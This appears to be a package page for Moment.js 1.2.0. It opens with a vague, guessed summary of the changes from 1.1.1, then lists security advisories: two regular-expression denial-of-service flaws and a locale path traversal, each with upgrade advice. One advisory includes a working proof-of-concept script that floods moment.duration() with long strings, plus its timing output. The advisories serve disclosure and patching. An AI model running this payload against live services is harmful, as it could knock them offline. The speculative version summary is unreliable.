Moment.js, a popular JavaScript date library praised for its ease of use in parsing, validating, manipulating, and formatting dates, saw a significant update with the release of version 1.2.0 following the previous stable version 1.1.1. Both versions maintain the core philosophy of simplifying date handling without modifying the native Date object, a crucial design choice for avoiding potential conflicts in larger projects.
The core difference lies in the enhancements and fixes introduced between the versions; however, detailed changelogs for such early versions are not readily available via this data. Developers upgrading would have likely benefited from bug fixes, performance improvements, and potentially new formatting or parsing options that weren't present in 1.1.1. The gap of roughly three weeks between the release dates, November 11th and December 6th, suggests that version 1.2.0 could include important patches accumulated during that period. It's worth noting that even in early versions, Moment.js, created by Tim Wood, provided a more human-friendly API compared to working directly with JavaScript's built-in date functions. For legacy systems dependent on these specific versions, understanding these subtle differences can be crucial. Developers were able to leverage the tarball URLs from the dist section to download the versions and integrate them into their projects. These early releases established Moment.js as a valuable tool for front-end and back-end development.
All the vulnerabilities related to the version 1.2.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: